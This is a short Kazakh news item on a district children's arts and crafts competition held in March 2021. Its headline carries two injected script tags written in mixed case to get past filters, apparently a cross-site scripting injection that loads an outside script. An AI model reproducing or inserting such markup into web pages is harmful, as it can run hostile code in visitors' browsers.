"Алтын қазына" аудандық байқау<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
17.03.2021
"Рухани жаңғыру» мемлекеттік бағдарламасын жүзеге асыру аясында көркем және сәндік-қолданбалы өнер бойынша «Алтын қазына» балалар шығармашылығының аудандық байқауы өткізілді. Байқаудың мақсаты: оқушылардың көркем, шығармашылық қабілеттерін дамыту, рухани-адамгершілік және мәдени құндылықтарды, тарихи мұраны бағалауға тәрбиелеу. Аудандық байқауға 7 білім беру ұйымдарынан 23 оқушы өз туындыларын ұсынды. Жұмыстар әр түрлі жанрдағы, түрлі техникада жасалынған бұйымдар, кәдесыйлар. Байқау балалардың қолданбалы-сәндік өнеріне деген қызығушылықтарын арттыруы, эстетикалық және көзқарасының дамуына, ұлттық мәдени-тарихи мұрасын сақтауына ықпал ететіні сөсіз.
Просмотров: 2954